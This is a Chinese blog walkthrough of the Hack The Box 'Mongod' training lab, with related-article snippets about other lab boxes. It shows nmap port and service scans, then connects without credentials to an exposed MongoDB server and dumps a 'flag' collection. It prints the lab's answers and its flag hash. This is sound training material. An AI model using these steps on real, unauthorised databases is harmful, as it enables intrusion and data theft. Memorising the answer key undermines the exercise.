[StartingPoint][Tier0]Mongod

2024-04-05 02:36
文章标签 tier0 mongod startingpoint

本文主要是介绍[StartingPoint][Tier0]Mongod,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

Task 1

How many TCP ports are open on the machine?

(机器上打开了多少个 TCP 端口?)

Example:

$ sudo nmap -sS -T4 10.129.222.112 -p 27017,22

image.png

2

Task 2

Which service is running on port 27017 of the remote host?

(哪个服务正在远程主机的端口 27017 上运行?)

Example:

$ nmap -sV 10.129.222.112 -p 27017

image.png

MongoDB 3.6.8

Task 3

What type of database is MongoDB? (Choose: SQL or NoSQL)

(MongoDB 是什么类型的数据库? (选择:SQL 或 NoSQL))

NoSQL

Task 4

What is the command name for the Mongo shell that is installed with the mongodb-clients package?

(与 mongodb-clients 包一起安装的 Mongo shell 的命令名称是什么?)

image.png

Example:

$ mongo --host 10.129.222.112

image.png

mongo

Task 5

What is the command used for listing all the databases present on the MongoDB server?

(用于列出 MongoDB 服务器上所有数据库的命令是什么?)

image.png

show dbs

Task 6

What is the command used for listing out the collections in a database?

(用于列出数据库中的集合的命令是什么?)

Example:

>use admin # 进入DB数据库

>show collections # 查看集合

image.png

show collections

Task 7

What is the command used for dumping the content of all the documents within the collection named flag in a format that is easy to read?

(用于以易于阅读的格式转储名为 flag 的集合中的所有文档内容的命令是什么?)

PS:注意这里db是代表当前数据库名,也就是说执行以下命令之前时,必须提前use xxx进入数据库才可以

image.png

db.flag.find().pretty()

Flag

Example:

>show dbs

>use sensitive_information

>db.flag.find().pretty()

image.png

1b6e6fb359e7c40241b6d431427ba6ea

这篇关于[StartingPoint][Tier0]Mongod的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/877442

相关文章

HTB-Mongod(MongoDb数据库)

前言 各位师傅大家好,我是qmx_07,今天给大家讲解Mongod靶场 Mongod 渗透过程 RustScan 介绍:Rustscan是一款用Rust语言开发的高速端口扫描器,它可以在3秒内扫描所有65535个端口,并支持脚本引擎和自适应学习功能,并且可以和nmap进行联动可以简单理解成 多线程的nmap扫描器 RustScan安装: 1.创建文件夹mkdir Rustsca

[StartingPoint][Tier2]Included

LXD https://www.hackingarticles.in/lxd-privilege-escalation/ Task 1 What service is running on the target machine over UDP? (目标机器上通过UDP运行的服务是什么?) $ nmap -sU 10.129.232.86 -p 69 tftp Task 2

[StartingPoint][Tier2]Unified

Task 1 Which are the first four open ports? (开启了哪4个端口?) $ namp -sC -sV -v 10.129.104.207 22,6789,8080,8443 Task 2 What is the title of the software that is running running on port 8443? (8

[StartingPoint][Tier2]Archetype

Task 1 Which TCP port is hosting a database server? (哪个端口开放了数据库服务) $ nmap 10.129.95.187 -sC --min-rate 1000 1433 Task 2 What is the name of the non-Administrative share available over SMB?

[StartingPoint][Tier1]Pennyworth

Important Jenkins是一个用于自动化构建、测试和部署软件项目的开源持续集成和持续部署(CI/CD)工具。它允许开发团队自动执行和监控在软件开发过程中的重复性任务,例如构建代码、运行测试、部署应用程序等。Jenkins提供了一个易于使用的Web界面,可以配置各种任务和工作流,并通过插件系统扩展其功能,以满足不同团队和项目的需求。Jenkins的灵活性和可扩展性使其成为许多开发团队的首

[StartingPoint][Tier1]Ignition

Task 1 Which service version is found to be running on port 80? (发现哪个服务版本在端口 80 上运行?) $ nmap -sV -Pn 10.129.1.27 -p 80 nginx 1.14.2 Task 2 What is the 3-digit HTTP status code returned when

[StartingPoint][Tier1]Sequel

Task 1 During our scan, which port do we find serving MySQL? (在扫描过程中,我们发现哪个端口为 MySQL 提供服务?) `` 3306 Task 2 What community-developed MySQL version is the target running? (目标正在运行哪个社区开发的 MySQL

[StartingPoint][Tier1]Crocodile

Task 1 What Nmap scanning switch employs the use of default scripts during a scan? (哪些 Nmap 扫描开关在扫描期间使用默认脚本?) -sC Task 2 What service version is found to be running on port 21? 发现端口 21 上运行的服务

[StartingPoint][Tier0]Dancing

Task 1 What does the 3-letter acronym SMB stand for? (3个字母的首字母缩略词SMB代表什么?) Server Message Block Task 2 What port does SMB use to operate at? (SMB 使用什么端口进行操作?) 445 Task 3 What is the ser

[StartingPoint][Tier0]Explosion

Task 1 What does the 3-letter acronym RDP stand for? (3个字母的首字母缩略词RDP代表什么?) Remote Desktop Protocol Task 2 What is a 3-letter acronym that refers to interaction with the host through a command